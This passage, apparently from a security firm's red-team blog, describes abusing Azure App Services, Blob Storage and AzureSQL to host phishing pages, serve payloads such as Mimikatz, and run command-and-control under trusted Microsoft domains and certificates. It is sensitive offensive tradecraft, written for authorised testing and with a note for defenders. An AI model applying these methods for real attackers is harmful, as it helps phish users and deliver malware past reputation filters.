AzureSQLdatabase.windows.netGoodGoodGoodGood
Cosmos DBdocuments.azure.comNeutralNeutralNeutralNeutral
IoT Hubazure-devices.netNeutralNo ScoreNeutralNo Score

Note: We also looked at the specific subdomains that were attached to these Azure domains and included their reputations in the last two columns. All subdomains were created fresh and did not get seasoned prior to reputation checking. If you’re looking for ways to get your domain trusted by web proxies, take a look at Ryan Gandrud’s post – Adding Web Content Filter Exceptions for Phishing Success.

For the purposes of this blog, we’re just going to focus on the App Services, Blob Storage, and AzureSQL services, but there’s plenty of opportunities in the other services for additional research.

Hosting Your Phishing Site

The Azure App Services domains scored Neutral or No Score on the reputation scores, but there’s one great benefit from hosting your phishing site with Azure App Services – the SSL certificate. When you use the default options for spinning up an App Services “Web App”, you will be issued an SSL certificate for the site that is verified by Microsoft.

Cert

Now I would never encourage someone to pretend to be Microsoft, but I hear that it works pretty well for phishing exercises. One downside here is that the TLD (azurewebsites.net) isn’t the most known domain on the internet and it might raise some flags from people looking at the URL.

*This is also probably against the Azure terms and conditions, so insert your standard disclaimer here.

**Update: After posting this blog, my test site changed the ownership information on the SSL certificate (after ~5 days of uptime), so your mileage may vary.

As a security professional, I would probably take issue with that domain, but with a Microsoft verified certificate, I might have less apprehension. When the service was introduced, ZDNet actually called it “phishing-friendly”, but as far as we could find, it hasn’t really been adopted for red team operations.

The setup of an Azure App Services “Web App” is really straightforward and takes about 10 minutes total (assuming your phishing page code is all ready to go).

Check out the Microsoft documentation on how to set up your first App Services Web App here – https://docs.microsoft.com/en-us/azure/app-service/app-service-web-overview

Or just try it out on the Azure Portal – https://portal.azure.com

Storing Your Payloads

Setting up your payload delivery is also easy within Azure. Similar to the AWS S3 service, Microsoft has their own public HTTP file storage solution called Blob Storage. Blobs can be set up under a “Storage Account” using a unique name. The unique naming is due to the fact that each Blob is created as a subdomain of the “blob.core.windows.net” domain.

Blob

For example, any payloads stored in the “notpayloads” blob would be available at https://notpayloads.blob.core.windows.net/. We also found that these domains already had a “Good” reputation, so it makes them a great option for delivering payloads. If you can grab a quality Blob name (updates, photos, etc.), this will also help with the legitimacy of your payload URL.

I haven’t done extensive testing on long term storage of payloads in blobs, but a 2014 version of Mimikatz was not flagged by anything on upload, so I don’t think that should be an issue.

Setting up Blob storage is also really simple. Just make sure that you set your Blob container “Access policy” to “Blob” or “Container” to allow public access to your payloads.

If you need a primer, check out Microsoft’s documentation here – https://docs.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction

Setting Up Your C2 in Azure

There are several potential options for hosting your C2 infrastructure in Azure, but as a companion to this blog, Scott Sutherland has written up a method for using AzureSQL as a C2 option. He will be publishing that information on the NetSPI blog later this week.

Conclusions / Credits

You may not want to move the entirety of your red team operations to the Azure cloud, but it may be worth using some of the Azure services, considering the benefits that you get from Microsoft’s trusted domains. For the defenders that are reading, you may want to keep a closer eye on the traffic that’s going through the domains that we listed above. Security awareness training may also be useful in helping prevent your users from trusting an Azure phishing site.

Special thanks to Alexander Leary for the idea of storing payloads in Blob Storage, and Scott Sutherland for the brainstorming and QA help.

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X